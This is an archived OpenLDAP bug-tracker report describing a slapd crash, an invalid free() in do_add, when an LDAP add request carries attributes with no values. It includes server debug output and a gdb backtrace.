[Date Prev][Date Next] [Chronological] [Thread] [Top]

slapd crash ( malformed packet ) (ITS#1803)



Full_Name: Kervin Pierre
Version: CVS 05MAY02
OS: rh7.2
URL: ftp://ftp.openldap.org/incoming/
Submission from: (NULL) (65.186.68.157)


Manage to crash slapd by sending a LDAP packet with attributes that have no
values.  The crash seems to occur within the free() for the last attribute, in
my case 'description'.

Here is part of the server output ( different run from gdb stack below), with
MALLOC_CHECK_=1.  free() warns of an invalid pointer

...
do_add: dn (cn=tester,dc=my-domain,dc=com)
ber_scanf fmt ({m{W}}) ber:
no values for type description
daemon: select: listen=6 active_threads=1 tvp=NULL
daemon: select: listen=7 active_threads=1 tvp=NULL
send_ldap_result: conn=8 op=1 p=3
send_ldap_result: err=2 matched="" text="no values for attribute type"
send_ldap_response: msgid=2 tag=105 err=2
ber_flush: 42 bytes to sd 13
conn=8 op=1 RESULT tag=105 err=2 text=no values for attribute type
free(): invalid pointer 0x820e132!
daemon: activity on 1 descriptors
daemon: activity on: 13r
daemon: read activity on 13
connection_get(13)
connection_get(13): got connid=8
connection_read(13): checking for input on id=8
ber_get_next
ber_get_next: tag 0x30 len 5 contents:
ber_get_next
ber_get_next on fd 13 failed errno=11 (Resource temporarily unavailable)
do_unbind
...

(gdb) bt f
#0  chunk_free (ar_ptr=0x40387620, p=0x8214de2) at malloc.c:3180
        hd = 184815408
        sz = 184815408
        idx = 136400354
        next = 0x13255d12
        nextsz = 136400354
        prevsz = 184815408
        bck = 0x0
        fwd = 0x13255d12
        islr = 1077449044
        sz = 184815408
        next = 0x13255d12
        bck = 0x0
        islr = 1077449044
#1  0x402d3bf4 in __libc_free (mem=0x8214dea) at malloc.c:3154
        mem = (void *) 0x13255d12
        ar_ptr = (arena *) 0x40387620
        p = 0x8214de2
        hook = (void (*)()) 0xb040f30
#2  0x080e1d98 in ber_memfree (p=0x8214dea) at memory.c:143
        p = (void *) 0x13255d12
#3  0x0807ee7e in ch_free (ptr=0x8214dea) at ch_malloc.c:125
No locals.
#4  0x08070516 in do_add (conn=0x404c0e0c, op=0x8214e20) at add.c:140
        mod = (Modifications *) 0xb040f30
        rtag = 184815408
        ber = (BerElement *) 0x8214c00
        last = 0x8214e18 "\b9!\b\201"
        dn = {bv_len = 29, bv_val = 0x8214dc7 "cn=tester,dc=my-domain,dc=com"}
        len = 15
        tag = 184815408
        e = (Entry *) 0x8214ed8
        be = (Backend *) 0x8214c00
        modlist = (Modifications *) 0x0
        modtail = (Modifications **) 0x40905938
        tmp = {sml_mod = {sm_op = 136400544, sm_desc = 0x81aced4, sm_type =
{bv_len = 11, bv_val = 0x8214dea "description"}, 
    sm_bvalues = 0x0}, sml_next = 0xffffffff}
        text = 0x0
        rc = 2 
        manageDSAit = 184815408
#5  0x0806c09b in connection_operation (arg_v=0x8214ea0) at connection.c:963
        rc = 135974612
        arg = (struct co_arg *) 0x8214ea0
        tag = 104
        oldtag = 104
        conn = (Connection *) 0x404c0e0c
#6  0x080c5b39 in ldap_int_thread_pool_wrapper (xpool=0x81aced0) at tpool.c:401
        pool = (struct ldap_int_thread_pool_s *) 0x81aced0
        ctx = (ldap_int_thread_ctx_t *) 0x820d370
#7  0x40244b9c in pthread_start_thread (arg=0x40905be0) at manager.c:274
        self = 0x40905be0
        request = {req_thread = 0x0, req_kind = REQ_CREATE, req_args = {create =
{attr = 0x0, fn = 0, arg = 0x0, mask = {
        __val = {0 <repeats 32 times>}}}, free = {thread_id = 0}, exit = {code =
0}, post = 0x0}}
        outcome = (void *) 0xb040f30